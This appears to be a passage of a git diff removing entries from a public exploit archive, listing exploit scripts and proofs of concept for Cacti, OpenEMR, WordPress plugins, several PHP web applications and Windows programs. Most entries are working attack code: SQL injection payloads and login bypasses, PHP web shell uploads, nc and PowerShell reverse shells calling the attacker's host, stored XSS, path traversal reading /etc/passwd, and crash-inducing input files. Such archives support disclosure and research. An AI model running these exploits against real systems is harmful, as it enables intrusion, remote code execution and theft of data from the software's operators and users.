if "Invalid User Name/Password Please Retype" in login_request.text:
print("[-] Unable to log in. Check your credentials")
sys.exit()
else:
print("[+] Successfully logged in!")
else:
print("[-] Unable to retrieve CSRF token!")
sys.exit()
def exploit(lhost, lport, session):
rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
print("\n[+] SQL Injection:")
print(exploit_request.text)
try:
session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
except Exception:
pass
print("[+] Check your nc listener!")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True)
parser.add_argument('-u', metavar='<user>', help='user to log in', required=True)
parser.add_argument('-p', metavar='<password>', help="user's password", required=True)
parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True)
parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True)
args = parser.parse_args()
url = args.t
username = args.u
password = args.p
lhost = args.lhost
lport = args.lport
session = requests.Session()
login(url, username, password, session)
exploit(lhost, lport, session)

26
exploits/php/webapps/49988.txt
View file

@ -1,26 +0,0 @@
# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
# Date: 05022021
# Exploit Author: Avinash R
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.52729
# Tested on: Windows 10 Pro (No OS restrictions)
# CVE : CVE-202127673
# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
##### Step To Reproduce #####
1) Login to the admin page of Zenario CMS with admin credentials, which is
http://server_ip/zenario/admin.php
2) Click on, New → HTML page to create a new sample page and intercept it
with your interceptor.
3) Just a single quote on the 'cID' parameter will confirm the SQL
injection.
4) After confirming that the 'cID' parameter is vulnerable to SQL
injection, feeding the request to SQLMAP will do the rest of the work for
you.
############ End ############

88
exploits/php/webapps/50017.py
View file

@ -1,88 +0,0 @@
# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
# Date 15.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: All versions prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15152
# CWE: CWE-287
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
'''
Description:
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
the registration page and modifying the requested url to access the desired page. Some
examples of pages in the portal directory that are accessible after browsing to the
registration page include:
- add_edit_event_user.php
- find_appt_popup_user.php
- get_allergies.php
- get_amendments.php
- get_lab_results.php
- get_medications.php
- get_patient_documents.php
- get_problems.php
- get_profile.php
- portal_payment.php
- messaging/messages.php
- messaging/secure_chat.php
- report/pat_ledger.php
- report/portal_custom_report.php
- report/portal_patient_report.php
Normally, access to these pages requires authentication as a patient. If a user were to visit
any of those pages unauthenticated, they would be redirected to the login page.
'''
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--Openemrpath', type=str)
my_parser.add_argument('-R', '--PathToGet', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.Openemrpath
pathtoread = args.PathToGet
'''
Check for vulnerability:
'''
# Check, if Registration portal is enabled. If it is not, this exploit can not work
session = requests.Session()
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
check_vuln = session.get(check_vuln_url).text
print('')
print('[*] Checking vulnerability: ')
print('')
if "Enter email address to receive registration." in check_vuln:
print('[+] Host Vulnerable. Proceeding exploit')
else:
print('[-] Host is not Vulnerable: Registration for patients is not enabled')
'''
Exploit:
'''
header = {
'Referer': check_vuln_url
}
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
Exploit = session.get(exploit_url, headers=header)
print('')
print('[+] Results: ')
print('')
print(Exploit.text)
print('')

55
exploits/php/webapps/50090.txt
View file

@ -1,55 +0,0 @@
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A
# Proof of Concept :
1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.
###################### REQUEST ##########################################
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
####################### RESPONSE #########################################
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8
Host Name: MRT
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Murat
System Boot Time: 6/25/2021, 2:51:40 PM
System Manufacturer: Dell Inc.
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
############################################################################

45
exploits/php/webapps/50117.txt
View file

@ -1,45 +0,0 @@
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
# Date: 08/07/2021
# Exploit Author: Subhadip Nag
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP
# Description #
Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password)
2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
5) Stored XSS payload is fired
6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
8) Go back and again click 'Manage Type Ticket'
9) Stored XSS payload is fired
10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php
11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update
12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update
14) Logout and click 'Back Home'
15) Our XSS payload successful
# Image PoC : Reference Image #
1) https://ibb.co/g4hFQDV
2) https://ibb.co/frbpf9c
3) https://ibb.co/NtKrc9C
4) https://ibb.co/cFGWhCz
4) https://ibb.co/CMXmN4f
5) https://ibb.co/C0dV0PC
6) https://ibb.co/4ZW8tb3
7) https://ibb.co/3zgFq9b
8) https://ibb.co/wS8wXj8

15
exploits/php/webapps/50127.txt
View file

@ -1,15 +0,0 @@
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.

107
exploits/php/webapps/50159.py
View file

@ -1,107 +0,0 @@
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
import os, re, sys, argparse, requests
from termcolor import cprint
def banner():
os.system("cls")
print('''
___________ __
\_ _____/__ __ ____ _____/ |_
| __)_\ \/ // __ \ / \ __\\
| \\\\ /\ ___/| | \ |
/_______ / \_/ \___ >___| /__|
\/ \/ \/
Registration System
--[Authentication Bypass and RCE]--
@jjavierolmedo
''')
def get_args():
parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
args = parser.parse_args()
return args
def auth_bypass(s, proxies, url):
data = {
"username":"admin'#",
"password":""
}
r = s.post(url, data=data, proxies=proxies)
if('{"status":"success"}' in r.text):
cprint("[+] Authenticacion Bypass Success!\n", "green")
return s
else:
cprint("[-] Authenticacion Bypass Error!\n", "red")
sys.exit(0)
def upload_shell(s, proxies, url):
content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
file = {
'img':('cmd.php',content)
}
data = {
"name":"Event Registration System with QR Code - PHP",
"short_name":"ERS-QR-PHP",
}
r = s.post(url, files=file, data=data, proxies=proxies)
if('1' in r.text and r.status_code == 200):
cprint("[+] Upload Shell Success!\n", "green")
return s
else:
cprint("[-] Upload Shell Error!\n", "red")
sys.exit(0)
def get_shell_url(s, proxies, url):
r = s.get(url, proxies=proxies)
regex = '\_cmd.php"> (.*?)</a></li>'
shell_name = re.findall(regex, r.text)[0]
url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
def main():
banner()
args = get_args()
target = args.target
proxies = {'http':'','https':''}
if args.proxy:
proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
login_url = target + "/event/classes/Login.php?f=rlogin"
upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
shell_url = target + "/event/uploads/"
s = requests.Session()
s = auth_bypass(s, proxies, login_url)
s = upload_shell(s, proxies, upload_url)
s = get_shell_url(s, proxies, shell_url)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
cprint("[-] User aborted session\n", "red")
sys.exit(0)
# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo

32
exploits/php/webapps/50186.txt
View file

@ -1,32 +0,0 @@
# Exploit Title: WordPress Plugin LifterLMS 4.21.1 - Access Other Student Grades/Answers via IDOR
# Date: 2021-05-17
# Exploit Author: captain_hook
# Vendor Homepage: https://lifterlms.com
# Software Link: https://lifterlms.com
# Version: 4.21.1
# Tested on: any
Description
The plugin was affected by an IDOR issue, allowing students to see other student answers and grades
Proof of Concept
- Add 2 users with Student role for the scenario .
- Create A course With a quiz ( I picked True or Flase question for my quiz)
- Set Enrol on Free ( for the ease of scenario )
- Enrol into the Course with Student B and submit your answer to the Course .
The plugin will give a token like :
https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
To Check your answer was true or false.
Now Login as a Student A and Enroll in the Course. You can just use
the URL https://soft-dream.myliftersite.com/quiz/%d8%ac%d9%85%d8%b9-quiz/?attempt_key=wYK
and reach the Student B answer.
Fixed in version 4.21.2✓
References
https://make.lifterlms.com/2021/05/17/lifterlms-version-4-21-2/

73
exploits/php/webapps/50244.py
View file

@ -1,73 +0,0 @@
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
import requests
import random
import string
import json
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
session = requests.session()
print("Login Bypass\n")
request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":
print("Finding first driver\n")
getHTML = session.get(url + "admin/?page=drivers")
getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
print("Found firs driver ID : " + findFirstDriverID)
print("\nFinding path")
findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
shellPath = findPath[findPath.index("admin/"):len(findPath)]
SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
print("\nShell Path : " + url+shellPath+shellname+".php")
shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
else:
print("No bypass user")

21
exploits/php/webapps/50259.txt
View file

@ -1,21 +0,0 @@
# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
# Date: 09-02-2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
1. Login as "Parent"
2. Open a web proxy such as BurpSuite and capture the requests
3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
4. Check the response
PoC: https://youtu.be/wFwlbXANRCo

75
exploits/php/webapps/50265.py
View file

@ -1,75 +0,0 @@
# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import logging
import requests
import argparse
BANNER = """
Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS
by: \033[0m\033[1;31m \033[0m
\033[0m\033[1;32m \033[0m
\033[0m\033[1;33m \033[0m
\033[0m\033[1;34m \033[0m
\033[0m\033[1;35m \033[0m
\033[0m\033[1;36m \033[0m
"""
def exploit(url:str, file:str) -> None:
if not os.path.exists(file):
logging.error(f'{file} does not exist?')
return
logging.info(f'reading {file} for XSS content ...')
with open(file, 'r') as f:
xssPayload = f.read()
logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
r = requests.post(url + '/classes/SystemSettings.php',
data={'about_us' : xssPayload},
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP request failed')
return
logging.info('checking for XSS payload on main page ...')
r = requests.get(url)
if xssPayload not in r.text:
logging.error(f'XSS injection failed? received: {r.text}')
logging.warning('maybe about.html is not writable?')
return
logging.success('XSS payload found on target website')
return
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.url, args.file)

77
exploits/php/webapps/50288.py
View file

@ -1,77 +0,0 @@
# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE
# Date: 2021-08-13
# Exploit Author: mari0x00
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: 1.0
# Tested on: Windows 10 + XAMPP
#!/usr/bin/python3
import requests, socket, threading
import base64, time, sys
print(('''###########################################################''',"red"))
print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
print(('''###########################################################''',"red"))
print("")
URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
path = path.replace("\\", "\\\\")
rhost = input("Provide attacker IP: ") or "127.0.0.1"
rport = input("Provide attacker listening port: ") or "1337"
# sending webshell
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
requests.post(URL, data=payload)
def shell(rhost, rport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((rhost, int(rport)))
except socket.error as msg:
print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
sys.exit()
s.settimeout(5)
s.listen(5)
print('[+] Waiting for connection..')
conn = False
command=''
while conn == False:
try:
conn, addr = s.accept()
print("Got a connection from " + addr[0] + ":" + str(addr[1]))
conn.send('\n'.encode())
time.sleep(1)
print(conn.recv(0x10000).decode())
while(command != 'exit'):
command=input('')
conn.send((command + '\n').encode())
time.sleep(.3)
res = conn.recv(0x10000)
print(res.decode())
s.close()
sys.exit("[!] Program exited")
except socket.timeout:
pass
def start_shell(rhost, rport):
revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
revshell = revshell.encode('ascii')
revshell = base64.b64encode(revshell)
revshell = revshell.decode('ascii')
connection = requests.get(URL+"/lol.php?cmd=" + revshell)
print("[+] Starting to listen on port " + rport)
time.sleep(0.5)
threading.Thread(target=shell, args=(rhost, rport)).start()
time.sleep(2)
print("[+] Sending the reverse shell payload")
threading.Thread(target=start_shell, args=(rhost, rport)).start()

71
exploits/php/webapps/50354.py
View file

@ -1,71 +0,0 @@
# Exploit Title: Wordpress Plugin JS Jobs Manager 1.1.7 - Unauthenticated Plugin Install/Activation
# Google Dork: inurl:/wp-content/plugins/js-jobs/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/js-jobs/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("JS Job Manager <= 1.1.7 - Arbitrary Plugin Install/Activation")
print("Author -> space_hen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [plugin slug]")
print("Ex: python3 exploit.py https://example.com advanced-uploader")
print("Note: To activate plugin successfully, main plugin file")
print("should match slug, i.e ./plugin-slug/plugin-slug.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("Not Allowed!" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
slug = sys.argv[2]
ajax_action = 'jsjobs_ajax'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
data = {
"task" : "installPluginFromAjax",
"jsjobsme" : "jsjobs",
"pluginslug" : slug
}
print("Installing plugin...");
response = requests.post(uri, data=data )
print("Activating plugin...");
data = {
"task" : "activatePluginFromAjax",
"jsjobsme" : "jsjobs",
"pluginslug" : slug
}
response = requests.post(uri, data=data )
main();

40
exploits/php/webapps/50362.txt
View file

@ -1,40 +0,0 @@
# Exploit Title: Blood Bank System 1.0 - SQL Injection / Authentication Bypass
# Date: 30-9-2021
# Exploit Author: Nitin Sharma (vidvansh)
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
# Version: 1.0
# Tested on: Windows 10 , Apache , Mysql
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
Step 2 Enter anything in username and password
Step 3 Click on Login and capture the request in the burp suite
Step4 Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 Click forward and now you will be logged in as admin.
# PoC:
GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
# Authentication Bypass:
# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
Username: ** Random email**
Password: ' or 1 -- -

45
exploits/php/webapps/50372.txt
View file

@ -1,45 +0,0 @@
# Exploit Title: Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 Enter anything in username and password
Step 3 Click on Login and capture the request in the burp suite
Step4 Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 Click forward and now you will be logged in as admin.
# PoC:
POST /lodge/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/lodge/admin/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
# Authentication Bypass:
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
Username: ' or 1 -- -
Password: ' or 1 -- -

27
exploits/windows/dos/49567.txt
View file

@ -1,27 +0,0 @@
# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: http://agatasoft.com/
# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
# Version: 2.1
# Tested on: Windows 10 Home x64
#STEPS
# Open the program AgataSoft PingMaster Pro
# In Tools select the option Trace Route
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field Host name and click in Get IP from host name
# End :)
buffer = 'S' * 10000
try:
file = open("Gou.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

29
exploits/windows/dos/49568.txt
View file

@ -1,29 +0,0 @@
# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64
#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click in Security Events
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Liella.txt"
# Paste the content in the field Event Description and click in Add Event
# End :)
buffer = 'U' * 10000
try:
file = open("Liella.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

30
exploits/windows/dos/49590.py
View file

@ -1,30 +0,0 @@
# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-23
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Version: 4.2.7
# Tested on: Windows 7 x64
# Steps:
1- Run the python script. (exploit.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Product Key Explorer 4.2.7'.
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.
---> exploit.py <--
#!/usr/bin/env python
buffer = "\x41" * 300
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print "File created!"
except:
print "File cannot be created!!"

36
exploits/windows/dos/50247.py
View file

@ -1,36 +0,0 @@
# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
# Exploit Author: Aryan Chehreghani
# Date: 2021-08-30
# Vendor Homepage: https://telegram.org
# Software Link: https://telegram.org/dl/desktop/win64
# Tested Version: 2.9.2 x64
# Tested on OS: Windows 10 Enterprise
# [ About App ]
#Telegram is a messaging app with a focus on speed and security, its super-fast, simple and free,
#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
#You can write to your phone contacts and find people by their usernames. As a result,
#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
#Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.
# [ POC ]
